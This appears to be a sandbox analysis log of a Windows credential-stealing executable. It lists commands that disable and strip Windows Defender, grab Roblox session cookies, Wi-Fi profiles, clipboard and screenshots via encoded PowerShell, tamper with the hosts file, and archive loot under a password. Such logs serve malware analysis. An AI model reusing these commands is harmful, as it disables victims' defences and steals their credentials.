Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
